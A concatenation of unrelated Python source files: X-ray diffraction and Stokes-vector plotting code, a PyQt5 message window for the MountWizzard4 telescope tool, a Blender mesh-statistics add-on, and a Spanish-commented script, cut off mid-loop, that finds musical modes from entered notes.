ax2_phase.plot(plot_1d[4].x, plot_1d[4].y, "g-.")
ax2_phase.set_title(plot_1d[4].title)
ax2_phase.set_xlabel(plot_1d[4].title_x_axis)
ax2_phase.set_ylabel(plot_1d[4].title_y_axis)
ax2_phase.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax2_phase.set_ylim([values.phase_inf_limit, values.phase_sup_limit])
ax3_intensity.plot(plot_1d[2].x, plot_1d[2].y, "b-")
ax3_intensity.set_title(plot_1d[2].title)
ax3_intensity.set_xlabel(plot_1d[2].title_x_axis)
ax3_intensity.set_ylabel(plot_1d[2].title_y_axis)
ax3_intensity.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax3_intensity.set_ylim([0, 1])
ax3_phase.plot(plot_1d[5].x, plot_1d[5].y, "g-.")
ax3_phase.set_title(plot_1d[5].title)
ax3_phase.set_xlabel(plot_1d[5].title_x_axis)
ax3_phase.set_ylabel(plot_1d[5].title_y_axis)
ax3_phase.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax3_phase.set_ylim([values.phase_inf_limit, values.phase_sup_limit])
def hirano_plot(plot_1d, values):
"""
Create a plot following the representation used in:
K.Hirano et al., 'Perfect Crystal X-ray phase retarders' (1993).
:param plot_1d: PlotData1D object.
:param values: Values object.
"""
# Create subplots.
f, ax = plt.subplots(1, 1)
# Intensity plots.
ax.plot(plot_1d[0].x, plot_1d[0].y, "b-", label="sigma intensity")
ax.plot(plot_1d[1].x, plot_1d[1].y, "k--", label="pi intensity")
plt.legend(loc="upper left")
ax.set_title("Hirano plot")
ax.set_xlabel(plot_1d[0].title_x_axis)
ax.set_ylabel(plot_1d[0].title_y_axis)
ax.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
# Phase difference plot.
ax_bis = ax.twinx() # phase and intensities share the same x axis.
ax_bis.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax_bis.set_ylim([values.phase_inf_limit, values.phase_sup_limit])
ax_bis.plot(plot_1d[5].x, plot_1d[5].y, "g-.", label="phase retardation")
ax_bis.set_ylabel(plot_1d[5].title_y_axis)
plt.legend(loc="center left")
def stokes_plot(plot_1d, values):
"""
Plot the Stokes vectors.
:param plot_1d: PlotData1D object.
:param values: Values object.
"""
# Create subplots.
f, ((ax00, ax01), (ax10, ax11)) = plt.subplots(2, 2, sharex="all", sharey="all")
ax00.plot(plot_1d[0].x, plot_1d[0].y, "-")
ax00.set_title(plot_1d[0].title)
ax00.set_xlabel(plot_1d[0].title_x_axis)
ax00.set_ylabel(plot_1d[0].title_y_axis)
ax00.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax00.set_ylim([-1.0, 1.0])
ax01.plot(plot_1d[1].x, plot_1d[1].y, "-")
ax01.set_title(plot_1d[1].title)
ax01.set_xlabel(plot_1d[1].title_x_axis)
ax01.set_ylabel(plot_1d[1].title_y_axis)
ax01.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax01.set_ylim([-1.0, 1.0])
ax10.plot(plot_1d[2].x, plot_1d[2].y, "-")
ax10.set_title(plot_1d[2].title)
ax10.set_xlabel(plot_1d[2].title_x_axis)
ax10.set_ylabel(plot_1d[2].title_y_axis)
ax10.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax10.set_ylim([-1.0, 1.0])
ax11.plot(plot_1d[3].x, plot_1d[3].y, "-")
ax11.set_title(plot_1d[3].title)
ax11.set_xlabel(plot_1d[3].title_x_axis)
ax11.set_ylabel(plot_1d[3].title_y_axis)
ax11.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax11.set_ylim([-1.0, 1.0])
def polarization_degree_plot(plot_1d, values):
"""
Plot the degree of circular polarization.
:param plot_1d: PlotData1D object.
:param values: Values object.
"""
f, polarization_degree = plt.subplots(1, 1)
polarization_degree.plot(plot_1d[4].x, plot_1d[4].y, "b-")
polarization_degree.set_title(plot_1d[4].title)
polarization_degree.set_xlabel(plot_1d[4].title_x_axis)
polarization_degree.set_ylabel(plot_1d[4].title_y_axis)
polarization_degree.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
polarization_degree.set_ylim([-1, 1])
def plot_diffraction_1d(result, deg):
"""
Returns this result instance in PlotData1D representation.
:param deg: if False the phase is expressed in radians, if True in degrees.
"""
# Distinguish between the strings "phase in deg" and "phase in rad".
if deg:
phase_string = "Phase in deg"
else:
phase_string = "Phase in rad"
# Retrieve setup information.
info_dict = result.diffractionSetup().toDictionary()
info_dict["Bragg angle"] = str(result.braggAngle())
# Retrieve angles of the results.
angles_in_um = [i * 1e+6 for i in result.angleDeviations()]
# Define inner function to duplicate info for every plot.
def addPlotInfo(info_dict, energy, angles_in_um, data):
plot_data = PlotData1D(data[0], data[1], data[2])
plot_data.set_x(angles_in_um)
plot_data.set_y(data[3])
for key, value in info_dict.items():
plot_data.add_plot_info(key, value)
plot_data.add_plot_info("Energy", str(energy))
return plot_data
plots = []
for energy in result.energies():
# Intensity S polarization.
categories = []
s_intensity = ("Intensity - Polarization S",
"Angle deviation in urad",
"Intensity",
result.sIntensityByEnergy(energy))
plots.append(addPlotInfo(info_dict, energy, angles_in_um, s_intensity))
p_intensity = ("Intensity - Polarization P",
"Angle deviation in urad",
"Intensity",
result.pIntensityByEnergy(energy))
plots.append(addPlotInfo(info_dict, energy, angles_in_um, p_intensity))
intensity_difference = ("Intensity difference",
"Angle deviation in urad",
"Intensity",
result.differenceIntensityByEnergy(energy))
plots.append(addPlotInfo(info_dict, energy, angles_in_um, intensity_difference))
s_phase = ("Phase - Polarization S",
"Angle deviation in urad",
phase_string,
result.sPhaseByEnergy(energy, deg))
plots.append(addPlotInfo(info_dict, energy, angles_in_um, s_phase))
p_phase = ("Phase - Polarization P",
"Angle deviation in urad",
phase_string,
result.pPhaseByEnergy(energy, deg))
plots.append(addPlotInfo(info_dict, energy, angles_in_um, p_phase))
phase_difference = ("Phase difference",
"Angle deviation in urad",
phase_string,
result.differencePhaseByEnergy(energy, deg))
plots.append(addPlotInfo(info_dict, energy, angles_in_um, phase_difference))
return plots
def plot_stokes_1d(result):
"""
Returns this result instance in PlotData1D representation.
"""
# Retrieve setup information.
info_dict = result.diffraction_setup.toDictionary()
info_dict["Bragg angle"] = str(result.diffraction_result.braggAngle())
# Retrieve angles of the results.
angles_in_urad = [i * 1e+6 for i in result.angle_deviations()]
# Define inner function to duplicate info for every plot.
def add_all_plot_info(info_dict, energy, angles_in_urad, data):
plot_data = PlotData1D(data[0], data[1], data[2])
plot_data.set_x(angles_in_urad)
plot_data.set_y(data[3])
for key, value in info_dict.items(): # dict.items() returns a list of (key, value) tuples
plot_data.add_plot_info(key, value)
plot_data.add_plot_info("Energy", str(energy))
return plot_data
plots = list()
for energy in result.energies():
s0 = ("Stokes parameter S0",
"Angle deviation in urad",
"S0",
result.s0_by_energy(energy))
plots.append(add_all_plot_info(info_dict, energy, angles_in_urad, s0))
s1 = ("Stokes parameter S1",
"Angle deviation in urad",
"S1",
result.s1_by_energy(energy))
plots.append(add_all_plot_info(info_dict, energy, angles_in_urad, s1))
s2 = ("Stokes parameter S2",
"Angle deviation in urad",
"S2",
result.s2_by_energy(energy))
plots.append(add_all_plot_info(info_dict, energy, angles_in_urad, s2))
s3 = ("Stokes parameter S3",
"Angle deviation in urad",
"S3",
result.s3_by_energy(energy))
plots.append(add_all_plot_info(info_dict, energy, angles_in_urad, s3))
polarization_degree = ("Degree of circular polarization",
"Angle deviation in urad",
"Circular polarization",
result.polarization_degree_by_energy(energy))
plots.append(add_all_plot_info(info_dict, energy, angles_in_urad, polarization_degree))
return plots
if __name__ == "__main__":
# Get values from user or use default values.
values = Values()
values.print()
# Create a diffraction setup.
# At this stage I translate angles in radians, energy in eV and all other values in SI units.
print("\nCreating a diffraction setup...")
diffraction_setup = DiffractionSetupSweeps(geometry_type=values.geometry_type, # GeometryType object
crystal_name=values.crystal_name, # string
thickness=float(values.thickness) * 1e-2, # meters
miller_h=int(values.miller_h), # int
miller_k=int(values.miller_k), # int
miller_l=int(values.miller_l), # int
asymmetry_angle=float(values.asymmetry_angle) / 180 * np.pi, # radians
azimuthal_angle=float(values.azimuthal_angle) / 180 * np.pi, # radians
energy_min=float(values.energy_min) * 1e3, # eV
energy_max=float(values.energy_max) * 1e3, # eV
energy_points=int(values.energy_points), # int
angle_deviation_min=float(values.angle_deviation_min) * 1e-6, # radians
angle_deviation_max=float(values.angle_deviation_max) * 1e-6, # radians
angle_deviation_points=int(values.angle_deviation_points)) # int
# Create a Diffraction object.
diffraction = Diffraction()
# Create a DiffractionResult object holding the results of the diffraction calculations.
print("\nCalculating the diffraction results...")
diffraction_result = diffraction.calculateDiffraction(diffraction_setup)
# Create a PlotData1D object.
print("\nCreating the diffraction profile plots...")
plot_1d = plot_diffraction_1d(diffraction_result, values.deg)
if False:
# Unwrap the phases.
print("\nUnwrapping the phase data...")
phase_limits = (values.phase_inf_limit, values.phase_sup_limit)
plot_1d[3].smart_unwrap(values.intervals, values.intervals_number, phase_limits, values.deg)
plot_1d[4].smart_unwrap(values.intervals, values.intervals_number, phase_limits, values.deg)
plot_1d[5].smart_unwrap(values.intervals, values.intervals_number, phase_limits, values.deg)
# Plot the diffraction results.
intensity_phase_plot(plot_1d, values)
# Create a plot following the representation used in:
# K.Hirano et al., 'Perfect Crystal X-ray phase retarders' (1993).
hirano_plot(plot_1d, values)
# Create a MuellerDiffraction object.
mueller_diffraction = MuellerDiffraction(diffraction_result,
values.incoming_stokes_vector,
values.inclination_angle*np.pi/180.0)
# Create a MullerResult object.
print("\nCalculating the Stokes vector...")
mueller_result = mueller_diffraction.calculate_stokes()
# Create a PlotData1D object.
print("\nCreating the Stokes parameters plots...")
plot_1d = plot_stokes_1d(mueller_result)
# Plot the Stokes vectors.
stokes_plot(plot_1d, values)
# Plot the degree of circular polarization.
polarization_degree_plot(plot_1d, values)
plt.show()
|
<reponame>Raddock/MountWizzard4<filename>mw4/gui/messageW.py
############################################################
# -*- coding: utf-8 -*-
#
# # # # # # #
# ## ## # ## # #
# # # # # # # # # # #
# # ## # ## ## ######
# # # # # # #
#
# Python-based Tool for interaction with the 10micron mounts
# GUI with PyQT5 for python
# Python v3.7.5
#
# <NAME>
# (c) 2019
#
# Licence APL2.0
#
###########################################################
# standard libraries
import logging
import time
import json
import pkg_resources
# external packages
import PyQt5.QtCore
import PyQt5.QtWidgets
import PyQt5.uic
# local import
import mw4
from mw4.gui import widget
from mw4.gui.widgets import message_ui
from indibase import qtIndiBase
class MessageWindow(widget.MWidget):
"""
the message window class handles
"""
__all__ = ['MessageWindow',
]
logger = logging.getLogger(__name__)
def __init__(self, app):
super().__init__()
self.app = app
self.ui = message_ui.Ui_MessageDialog()
self.ui.setupUi(self)
self.initUI()
self.messColor = [self.COLOR_ASTRO,
self.COLOR_WHITE,
self.COLOR_YELLOW,
self.COLOR_RED,
]
self.messFont = [PyQt5.QtGui.QFont.Normal,
PyQt5.QtGui.QFont.Bold,
PyQt5.QtGui.QFont.Normal,
PyQt5.QtGui.QFont.Normal,
]
self.initConfig()
self.showWindow()
def initConfig(self):
"""
initConfig read the key out of the configuration dict and stores it to the gui
elements. if some initialisations have to be proceeded with the loaded persistent
data, they will be launched as well in this method.
:return: True for test purpose
"""
if 'messageW' not in self.app.config:
self.app.config['messageW'] = {}
config = self.app.config['messageW']
x = config.get('winPosX', 100)
y = config.get('winPosY', 100)
if x > self.screenSizeX:
x = 0
if y > self.screenSizeY:
y = 0
self.move(x, y)
height = config.get('height', 600)
self.resize(800, height)
return True
def storeConfig(self):
"""
storeConfig writes the keys to the configuration dict and stores. if some
saving has to be proceeded to persistent data, they will be launched as
well in this method.
:return: True for test purpose
"""
if 'messageW' not in self.app.config:
self.app.config['messageW'] = {}
config = self.app.config['messageW']
config['winPosX'] = self.pos().x()
config['winPosY'] = self.pos().y()
config['height'] = self.height()
return True
def closeEvent(self, closeEvent):
self.storeConfig()
# gui signals
self.ui.clear.clicked.disconnect(self.clearWindow)
self.app.message.disconnect(self.writeMessage)
super().closeEvent(closeEvent)
def showWindow(self):
self.show()
# write basic data to message window
profile = self.app.config.get('profileName', '-')
self.writeMessage('MountWizzard4 started', 1)
self.writeMessage(f'Workdir is: [{self.app.mwGlob["workDir"]}]', 1)
self.writeMessage(f'Profile [{profile}] loaded', 0)
# gui signals
self.ui.clear.clicked.connect(self.clearWindow)
self.app.message.connect(self.writeMessage)
def clearWindow(self):
"""
clearWindow resets the window and shows empty text.
:return: true for test purpose
"""
self.ui.message.clear()
return True
def writeMessage(self, message, mType=0):
"""
writeMessage takes singles with message and writes them to the text browser window.
types:
0: normal text
1: highlighted text
2: warning text
3: error text
:param message: message text
:param mType: message type
:return: true for test purpose
"""
if mType < 0:
return False
if mType > len(self.messColor):
return False
prefix = time.strftime('%H:%M:%S ', time.localtime())
message = prefix + message
self.logger.info('Message window: [{0}]'.format(message))
self.ui.message.setTextColor(self.messColor[mType])
self.ui.message.setFontWeight(self.messFont[mType])
self.ui.message.insertPlainText(message + '\n')
self.ui.message.moveCursor(PyQt5.QtGui.QTextCursor.End)
return True
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# Copyright (C) 2020 Wheatfield Media INC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import os
from bpy.types import Operator,Panel,PropertyGroup,Operator
from bpy.props import BoolProperty,FloatProperty,IntProperty
import bmesh
from ..core import common
from ..core.total_operator import CheckModelTool as CheckModel
blender_version = bool(bpy.app.version >= (2, 80, 0))
class VIEW3D_PT_Check_Model_UI(Panel):
bl_label = "Object statistics"
bl_idname = "VIEW3D_PT_Check_Model_UI"
bl_space_type = "VIEW_3D"
bl_region_type = "UI" if blender_version else "TOOLS"
bl_category = "Object statistics"
def draw(self,context):
scene = context.scene
check = scene.ui_prop
updata = scene.total_lst
layout = self.layout
col = layout.column(align=False)
col.prop(check,"boolBox")
row = col.row(align=True)
row.operator(MESH_OT_CheckModel_UpData.bl_idname,text="Refresh",icon="FILE_REFRESH")
row.operator(MESH_OT_ShowInfo_UpData.bl_idname,text="Details",icon="INFO")
label_str = [
"Total Count: ",
"Geometries: ",
"Polygons:",
"Vertices:",
"Objects with Isolated Vertices:",
"Isolated Vertices:",
"Objects with Isolated Edge:",
"Isolated Edge:",
"Objects with Isolated Face:",
"Isolated Face:",
"Objects with Overlapping Vertices:",
"Overlapping Vertices:",
"Objects with NGons:",
"NGons:",
"Objects with Overlapping UV Polygons:",
"Overlapping UV Polygons:",
"Overflowing UV Area:",
"Textures:",
"Missing Textures:",
"Objects with Missing Textures:",
]
col.prop(check,"boolBox_ob")
box1 = col.box().grid_flow(align=True,row_major=True,columns=2)
box1.enabled = check.boolBox_ob
col.prop(check,"boolBox_loose")
box2 = col.box().grid_flow(align=True,row_major=True,columns=2)
box2.enabled = check.boolBox_loose
col.prop(check,"boolBox_mutl")
box3 = col.box().grid_flow(align=True,row_major=True,columns=3)
box3.enabled = check.boolBox_mutl
col.prop(check,"boolBox_NGons")
box4 = col.box().grid_flow(align=True,row_major=True,columns=2)
box4.enabled = check.boolBox_NGons
col.prop(check,"boolBox_uv")
box5 = col.box().grid_flow(align=True,row_major=True,columns=3)
box5.enabled = check.boolBox_uv
col.prop(check,"boolBox_img")
box6 = col.box().grid_flow(align=True,row_major=True,columns=3)
box6.enabled = check.boolBox_img
for i in range(len(label_str)):
if i in [0,1,2,3]:
row = box1.row(align=True).box().row(align=True)
row.label(text=label_str[i])
row.label(text=str(updata[0][i]))
elif i in [4,5,6,7,8,9]:
row = box2.row(align=True).box().row(align=True)
row.label(text=label_str[i])
row.label(text=str(updata[0][i]))
elif i in [10,11]:
row = box3.row(align=True).box().row(align=True)
row.label(text=label_str[i])
row.label(text=str(updata[0][i]))
if i == 11:
row.prop(check,"threshold_value",text="Threshold")
elif i in [12,13]:
row = box4.row(align=True).box().row(align=True)
row.label(text=label_str[i])
row.label(text=str(updata[0][i]))
'''----Start with here'''
if i == 13:
check_mesh = scene.check
if check_mesh.ngons:
row.prop(check_mesh,"ngons_verts_count",text="Edge Number")
else:
row.prop(check,"ngons_count",text="Edge Number")
elif i in [14,15,16]:
row = box5.row(align=True).box().row(align=True)
row.label(text=label_str[i])
row.label(text=str(updata[0][i]))
elif i in [17,18,19]:
row = box6.row(align=True).box().row(align=True)
row.label(text=label_str[i])
row.label(text=str(updata[0][i]))
class MESH_OT_CheckModel_UpData(Operator):
bl_idname="check_model.updata"
bl_label = "check_model_updata"
def execute(self,context):
scene = context.scene
check = scene.ui_prop
if bpy.context.mode != "OBJECT":
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT')
bpy.context.scene.total_lst.clear()
sc_obs_total = CheckModel().init(mutl_ver_dist=check.threshold_value,
open_ob=check.boolBox_ob,
open_loose=check.boolBox_loose,
open_mutl=check.boolBox_mutl,
open_gnons=check.boolBox_NGons,
open_uv=check.boolBox_uv,
open_img=check.boolBox_img)
for i in sc_obs_total:
bpy.context.scene.total_lst.append(i)
bpy.ops.object.select_all(action='DESELECT')
return {"FINISHED"}
class MESH_OT_ShowInfo_UpData(Operator):
bl_idname="show_info.updata"
bl_label = "ShowInfo"
def invoke(self, context, event):
wm = context.window_manager
return wm.invoke_props_dialog(self, width=1100)
def draw(self,context):
scene = context.scene
check = scene.ui_prop
updata = scene.total_lst
layout = self.layout
col = layout.column(align=True)
tab_head = [
"Object Name",
"Object Location",
"Object Rotation",
"Object Scale",
"Isolated Vertices",
"Isolated Edges",
"Isolated Faces",
"Overlapping Vertices",
"NGons",
"Overlapping UV Polygons",
"UV Area",
"UV Overflow",
"Missing Textures",
]
row = col.row(align=True)
for i in tab_head:
box = row.box()
if i == "Object Name":
box.label(text=i)
box.scale_x = 450
else:
box.scale_x = 10
box.label(text=i)
check_data = []
if check.boolBox:
check_data = updata[2]
else:
check_data = updata[1]
col = col.column(align=True)
for item in check_data:
row = col.row(align=True)
for j in range(len(item)):
box = row.box()
if j == 0:
box.label(text=str(item[j]))
box.scale_x = 450
else:
box.scale_x = 10
box.label(text=str(item[j]))
def execute(self,context):
return {"FINISHED"}
class Check_Scene_Props(PropertyGroup):
boolBox : BoolProperty(name="Display Errors Only", default=True)
threshold_value: FloatProperty(name="",description="Threshold",subtype="DISTANCE",default=0.0001,min=0.00001,max=10)
boolBox_ob: BoolProperty(name="Object:",default=True,description="Count objects")
boolBox_loose : BoolProperty(name="Isolated Elements:",default=True,description="Count the isolated elements")
boolBox_mutl: BoolProperty(name="Overlapping Vertices:",default=True,description="Count doubles of geometry")
boolBox_NGons: BoolProperty(name="NGons:",default=True,description="Count the N-gons of geometry")
boolBox_uv: BoolProperty(name="UV:",default=False,description="Heavy calculations. Off by default.")
boolBox_img: BoolProperty(name="Images:",default=True,description="Images count")
'''---Modify--Polygon Edge Count'''
ngons_count: IntProperty(name="Polygon Edge Count",description="Polygon Edge Count",default = 5,min = 5) |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#import stdin
#import argparse
import re
"""
Script para determinar las posibles tonalidades a partir de las notas insertadas
Las notas se puede insertar del siguiente modo:
C
Cmaj7
Cmin7
Csus
C#
Por ahora, no se soporta poner "b". Cualquier bemol debe meterse como "#"
"""
def modo_jonico(nota):
candidata = 0
#Cadencia jonico 7: 1 - 1 - 1/2 - 1 - 1 - 1 - 1/2
cadencia = (2, 2, 1, 2, 2, 2, 1)
tonos = ('maj7', 'min7', 'min7', 'maj7', 'dom', 'min7', 'semi', 'maj7')
abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
base = abanico_notas.index(nota.replace('maj7','').replace('min7',''))
#print ' posicion para', nota,' en mayor', base
tono = []
index = 0
varTmp1 = abanico_notas[base]
varTmp2 = tonos[index]
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
for value in cadencia:
index = index + 1
#print 'index es', index
#print 'buscara posicion', (base+value) % len(abanico_notas)
varTmp1 = abanico_notas[(base+value) % len(abanico_notas)]
#print ' nota encontrada', varTmp1
varTmp2 = tonos[index]
#print ' tono para nota encontrada', varTmp2
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
base += value
#print 'Tonalidad', nota,'mayor:'
#for value in tono:
# print ' ', value
return (tono)
def modo_dorico(nota):
candidata = 0
#Cadencia dorico 7: 1 - 1/2 - 1 - 1 - 1 - 1/2 - 1
cadencia = (2, 1, 2, 2, 2, 1, 2)
tonos = ('min7', 'semi', 'maj7', 'min7', 'min7', 'maj7', 'dom', 'min7')
abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
base = abanico_notas.index(nota.replace('maj7','').replace('min7',''))
#print ' posicion para', nota,' en mayor', base
tono = []
index = 0
varTmp1 = abanico_notas[base]
varTmp2 = tonos[index]
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
for value in cadencia:
index = index + 1
#print 'index es', index
#print 'buscara posicion', (base+value) % len(abanico_notas)
varTmp1 = abanico_notas[(base+value) % len(abanico_notas)]
#print ' nota encontrada', varTmp1
varTmp2 = tonos[index]
#print ' tono para nota encontrada', varTmp2
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
base += value
#print 'Tonalidad', nota,'mayor:'
#for value in tono:
# print ' ', value
return (tono)
def modo_frigio(nota):
candidata = 0
#Cadencia frigio 7: 1/2 - 1 - 1 - 1- 1/2 - 1 - 1
cadencia = (1, 2, 2, 2, 1, 2, 2)
tonos = ('min7', 'maj7', 'dom', 'min7', 'dism', 'maj7', 'min7', 'min7')
abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
base = abanico_notas.index(nota.replace('maj7','').replace('min7',''))
#print ' posicion para', nota,' en mayor', base
tono = []
index = 0
varTmp1 = abanico_notas[base]
varTmp2 = tonos[index]
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
for value in cadencia:
index = index + 1
#print 'index es', index
#print 'buscara posicion', (base+value) % len(abanico_notas)
varTmp1 = abanico_notas[(base+value) % len(abanico_notas)]
#print ' nota encontrada', varTmp1
varTmp2 = tonos[index]
#print ' tono para nota encontrada', varTmp2
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
base += value
#print 'Tonalidad', nota,'mayor:'
#for value in tono:
# print ' ', value
return (tono)
def modo_lidio(nota):
candidata = 0
#Cadencia lidio 7: 1 - 1 - 1 - 1/2 - 1 - 1- 1/2
cadencia = (2, 2, 2, 1, 2, 2, 1)
tonos = ('maj7', 'dom', 'min7', 'dism', 'maj7', 'min7', 'min7', 'maj7')
abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
base = abanico_notas.index(nota.replace('maj7','').replace('min7',''))
#print ' posicion para', nota,' en mayor', base
tono = []
index = 0
varTmp1 = abanico_notas[base]
varTmp2 = tonos[index]
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
for value in cadencia:
index = index + 1
#print 'index es', index
#print 'buscara posicion', (base+value) % len(abanico_notas)
varTmp1 = abanico_notas[(base+value) % len(abanico_notas)]
#print ' nota encontrada', varTmp1
varTmp2 = tonos[index]
#print ' tono para nota encontrada', varTmp2
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
base += value
#print 'Tonalidad', nota,'mayor:'
#for value in tono:
# print ' ', value
return (tono)
def modo_mixolidio(nota):
candidata = 0
#Cadencia mixolidio 7: 1 - 1 - 1/2 - 1 - 1 - 1/2 - 1
cadencia = (2, 2, 1, 2, 2, 1, 2)
tonos = ('dom', 'min7', 'dism', 'maj7', 'min7', 'min7', 'maj7', 'dom')
abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
base = abanico_notas.index(nota.replace('maj7','').replace('min7',''))
#print ' posicion para', nota,' en mayor', base
tono = []
index = 0
varTmp1 = abanico_notas[base]
varTmp2 = tonos[index]
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
for value in cadencia:
index = index + 1
#print 'index es', index
#print 'buscara posicion', (base+value) % len(abanico_notas)
varTmp1 = abanico_notas[(base+value) % len(abanico_notas)]
#print ' nota encontrada', varTmp1
varTmp2 = tonos[index]
#print ' tono para nota encontrada', varTmp2
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
base += value
#print 'Tonalidad', nota,'mayor:'
#for value in tono:
# print ' ', value
return (tono)
def modo_eolico(nota):
candidata = 0
#Cadencia eolico 7: 1 - 1/2 - 1 - 1- 1/2 - 1 - 1
cadencia = (2, 1, 2, 2, 1, 2, 2)
tonos = ('min7', 'dism', 'maj7', 'min7', 'min7', 'maj7', 'dom', 'min7')
abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
base = abanico_notas.index(nota.replace('maj7','').replace('min7',''))
#print ' posicion para', nota,' en mayor', base
tono = []
index = 0
varTmp1 = abanico_notas[base]
varTmp2 = tonos[index]
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
for value in cadencia:
index = index + 1
#print 'index es', index
#print 'buscara posicion', (base+value) % len(abanico_notas)
varTmp1 = abanico_notas[(base+value) % len(abanico_notas)]
#print ' nota encontrada', varTmp1
varTmp2 = tonos[index]
#print ' tono para nota encontrada', varTmp2
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
base += value
#print 'Tonalidad', nota,'mayor:'
#for value in tono:
# print ' ', value
return (tono)
def modo_locria(nota):
candidata = 0
#Cadencia locria 7: 1/2 - 1 - 1- 1/2 - 1 - 1 - 1
cadencia = (1, 2, 2, 1, 2, 2, 2)
tonos = ('dism', 'maj7', 'min7', 'min7', 'maj7', 'dom', 'min7', 'dism')
abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
base = abanico_notas.index(nota.replace('maj7','').replace('min7',''))
#print ' posicion para', nota,' en mayor', base
tono = []
index = 0
varTmp1 = abanico_notas[base]
varTmp2 = tonos[index]
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
for value in cadencia:
index = index + 1
#print 'index es', index
#print 'buscara posicion', (base+value) % len(abanico_notas)
varTmp1 = abanico_notas[(base+value) % len(abanico_notas)]
#print ' nota encontrada', varTmp1
varTmp2 = tonos[index]
#print ' tono para nota encontrada', varTmp2
varTmp3 = ''.join([varTmp1, varTmp2])
tono.append(varTmp3)
base += value
#print 'Tonalidad', nota,'mayor:'
#for value in tono:
# print ' ', value
return (tono)
def chequeo_tono(tono, notas_array):
#print 'tono es', tono
for value in notas_array:
candidata = 0
#print 'value vale', value
if (value.find('#') != -1):
for nota in tono:
#print 'nota es', nota
if nota.startswith(value):
candidata = 1
break
else:
for nota in tono:
#print 'nota vale', nota
if (nota.startswith(value) and not (nota.find('#') != -1)):
candidata = 1
#print 'hizo match'
break
if not(candidata):
break
return(candidata)
def main():
notas_input = raw_input("Inserta las notas separadas por espacio: ")
notas_array = notas_input.split(' ')
while ('' in notas_array):
notas_array.remove('')
#index = notas_array.index('')
#notas_array.pop(index)
posibles_tonos = []
for index in range(0,len(notas_array)):
#Chequeo <NAME> (I)
tono = modo_jonico(notas_array[index])
candidata = chequeo_tono(tono, notas_array)
if (candidata):
posibles_tonos.append({})
posibles_tonos[-1]['modo'] = 'Jonico I (maj7)'
posibles_tonos[-1]['escala'] = []
posibles_tonos[-1]['escala'].append(tono)
#Chequeo Dorico Min7 (II)
tono = modo_dorico(notas_array[index])
candidata = chequeo_tono(tono, notas_array)
if (candidata):
posibles_tonos.append({})
posibles_tonos[-1]['modo'] = 'Dorico II (min7)'
posibles_tonos[-1]['escala'] = []
posibles_tonos[-1]['escala'].append(tono)
#Chequeo Frigio Min7 (III)
tono = modo_frigio(notas_array[index])
candidata = chequeo_tono(tono, notas_array)
if (candidata):
posibles_tonos.append({})
posibles_tonos[-1]['modo'] = 'Frigio III (min7)'
posibles_tonos[-1]['escala'] = []
posibles_tonos[-1]['escala'].append(tono)
#Chequeo <NAME> (IV)
tono = modo_lidio(notas_array[index])
candidata = chequeo_tono(tono, notas_array)
if (candidata):
posibles_tonos.append({})
posibles_tonos[-1]['modo'] = 'Lidio IV (maj7)'
posibles_tonos[-1]['escala'] = []
posibles_tonos[-1]['escala'].append(tono)
#Chequeo Mixolidio Dom (V)
tono = modo_mixolidio(notas_array[index])
candidata = chequeo_tono(tono, notas_array)
if (candidata):
posibles_tonos.append({})
posibles_tonos[-1]['modo'] = 'Mixolidio V (dom)'
posibles_tonos[-1]['escala'] = []
posibles_tonos[-1]['escala'].append(tono)
#Chequeo Eolico Min7 (VI)
tono = modo_eolico(notas_array[index])
candidata = chequeo_tono(tono, notas_array)
if (candidata):
posibles_tonos.append({})
posibles_tonos[-1]['modo'] = 'Eolico VI (min7)'
posibles_tonos[-1]['escala'] = []
posibles_tonos[-1]['escala'].append(tono)
#Chequeo Locria (VII)
tono = modo_locria(notas_array[index])
candidata = chequeo_tono(tono, notas_array)
if (candidata):
posibles_tonos.append({})
